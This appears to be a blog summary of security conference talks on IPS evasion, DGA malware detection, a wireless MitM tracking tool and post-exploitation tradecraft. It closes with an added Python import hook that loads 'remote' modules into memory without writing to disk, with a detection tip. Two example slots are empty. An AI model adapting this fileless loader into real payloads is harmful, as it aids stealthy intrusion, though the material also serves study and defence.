After some discussion of the well-known limitations of Intrusion Prevention Systems (IPS), the speaker discussed some fun ways of abusing IPS signatures, e.g. changing Firefox’s user agent string to match IPS signatures; Snort IDs 1390 and 1394 were given as typical examples of ‘Alert’ and ‘Drop’ rules.

Stonesoft’s expensive ‘Evader’ product was mentioned; the product is designed to (see if it can) bypass security device filters and signatures. A novel ‘free’ approach was suggested: utilising pcap files of malicious traffic along with the Fragrouter-style functionality now contained in tcpreplay to test your own environment.

The discussion moved on to the interesting idea of trying to develop an open source testing methodology for IDS/IPS devices and/or implementations, i.e. something akin to OWASP for web applications. This sounds like a great idea and hopefully we’ll see some output from this effort soon; the initial thinking was a top 5 of issues (similar to the OWASP Top 10) that, once adopted, could easily be added to.

Domain Generation Algorithm (DGA) Detection & Optimisation – Gunter Ollmann

This talk centred on the detection of the domains (e.g. ) being used by malware on infected hosts within your environment to get back to their command and control network(s).

Apparently the new generation of malware has a significant backup strategy: the callback domain(s) can be generated dynamically at some future date (e.g. by incorporating some information from the most popular article on the BBC news website for a given day). The speaker even stated that defenders can sometimes reverse the algorithm and beat the attackers to registering the callback domains.

The infected hosts may try to contact any of several hundred callback domains in the search for a valid command and control server. The identification of these domains, and subsequently the infected hosts within your environment, focused on analysing failed DNS look-ups. For example, if several hosts are making numerous failed DNS look-ups to ‘strange’ domains, analysis of these records could potentially identify infected hosts within your environment. Example of failed DNS lookups:

Terrorism, tracking, privacy and human interactions – Dan Cuthbert & Glenn Wilkinson

Whilst this talk was, generally speaking, very interesting, the key point to take away is that a new tool is shortly to be released: ‘Snoopy’. ‘Snoopy’ is a distributed wireless tracking and reporting framework comprising a client and server architecture. The client component can be installed on any Linux device capable of packet sniffing/packet injection.

The functionality of the tool ranges from:

  1. Rogue Access Point functionality (i.e. similar to karma/karmetasploit)
  2. General Man-in-the-Middle (MitM) capabilities
  3. SSL MitM via sslstrip
  4. JavaScript to profile devices
  5. Data extraction, e.g. search for all .doc instances

All of the above attacks are reported back to the ‘Snoopy’ server, which utilises a MySQL database for data storage. Finally some sample data gathered via the tools was demo’d in Paterva’s new Maltego Radium tool (basically think Maltego with loads of additions and improvements).

Post-Exploitation Tu-Dot-Oh! – Rich Smith

This talk focused on long-term penetration tests, i.e. test engagements of 6-12 months (we almost need a new term for this type of engagement!). The goals for the testing were two-fold:

  1. Read the target CEO’s e-mail
  2. Access and alter the target company’s source code

The fact that exploitation was the start of the attack and not the end was a major theme here. Another theme was that the way things are currently being done, e.g. using binary droppers (think msfpayload), may not be the answer. The problem with binary droppers is that all of the payload’s capabilities are built into them, providing a wealth of information for any savvy reverse engineers or forensics teams. And the solution?

  1. A single payload that can be run everywhere (any Operating System)
  2. A payload that provides scrambling and stealth; the full capabilities of the attacker are not built into the payload but kept server side.

The speaker’s solution was to send Python bytecode over the wire, i.e. it was portable, with functionality provided via ‘reach back’ rather than ‘bake in’. The Python loader demonstrated made use of import hooks and HTTPS GET requests to pull further bytecode, which runs in memory without touching the disk. Some of the other features of the tool demo’d:

  1. Resolves bytecode trees remotely and transparently, i.e. no source code modifications
  2. Scrubs memory after use
  3. Zip imports are used for larger bytecode imports from the server
  4. Unique victim IDs are taken from the System Management BIOS (SMBIOS) system UUID, a 128-bit value intended to be unique per machine (unlike MAC addresses); in practice some OEM images and virtual machines ship duplicate or all-zero UUIDs, so treat it as unique-ish
  5. A polling mechanism at random intervals is utilised to GET tasks from the server, which are queued up on a UUID basis
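As an added example (not the speaker's tool) of the ‘reach back’ import hook described above: a Python 3 meta-path finder that resolves imports against a remote module store instead of the filesystem, so capability arrives on demand and never exists as a file on the victim. The store here is an in-memory dict of constructed module source, standing in for the HTTPS GET the talk describes; fetch_remote(), REMOTE_STORE and the module names are assumptions, and a real implementation would swap in a transport and serve compiled bytecode.

```python
"""'Reach back' code loading through a Python import hook.

Added example, not the speaker's tool. A finder/loader pair on sys.meta_path
asks a remote store for every unresolved import, executes what comes back in
a fresh module object, and drops the source once compiled, so nothing is
written to disk. The store is an in-memory dict standing in for the server.
"""
import importlib
import importlib.abc
import importlib.util
import sys

# Constructed stand-in for the server: module name -> (source, is_package).
REMOTE_STORE = {
    "recon": (
        "import platform\n"
        "def host_summary():\n"
        "    return {'system': platform.system(), 'node': platform.node()}\n",
        False,
    ),
    "tasks": ("", True),                                   # package root
    "tasks.enumerate": ("def run():\n    return ['users', 'shares']\n", False),
}


def fetch_remote(name):
    """Return (source, is_package) for `name`, or None if the server has nothing.
    Replace with an HTTPS GET (and marshal.loads for bytecode) in real use."""
    return REMOTE_STORE.get(name)


class ReachBackFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Finder + loader: resolves imports remotely and executes them in memory."""

    def __init__(self, fetch):
        self.fetch = fetch

    def find_spec(self, fullname, path=None, target=None):
        hit = self.fetch(fullname)
        if hit is None:
            return None                       # let the normal finders handle it
        source, is_pkg = hit
        spec = importlib.util.spec_from_loader(
            fullname, self, origin="remote", is_package=is_pkg)
        spec.loader_state = source            # carried over to exec_module
        return spec

    def create_module(self, spec):
        return None                           # default module object is fine

    def exec_module(self, module):
        source = module.__spec__.loader_state
        module.__spec__.loader_state = None   # scrub: keep no source reference
        code = compile(source, "<remote:%s>" % module.__name__, "exec")
        exec(code, module.__dict__)           # runs entirely in memory


def install(fetch=fetch_remote):
    """Put the finder first on sys.meta_path so remote modules take priority."""
    finder = ReachBackFinder(fetch)
    sys.meta_path.insert(0, finder)
    return finder


def uninstall(finder):
    """Remove the finder and evict every module it loaded from sys.modules."""
    sys.meta_path.remove(finder)
    for name in list(sys.modules):
        spec = getattr(sys.modules[name], "__spec__", None)
        if spec is not None and spec.origin == "remote":
            del sys.modules[name]


if __name__ == "__main__":
    f = install()
    try:
        print(importlib.import_module("recon").host_summary())
        print(importlib.import_module("tasks.enumerate").run())
    finally:
        uninstall(f)
```

Because the finder sits first on sys.meta_path, every import in the process consults the store before the filesystem, which is also the defender's hook: a module whose `__spec__.origin` is not a path on disk, or a finder on sys.meta_path that is not one of the interpreter's own, is worth an alert in memory forensics.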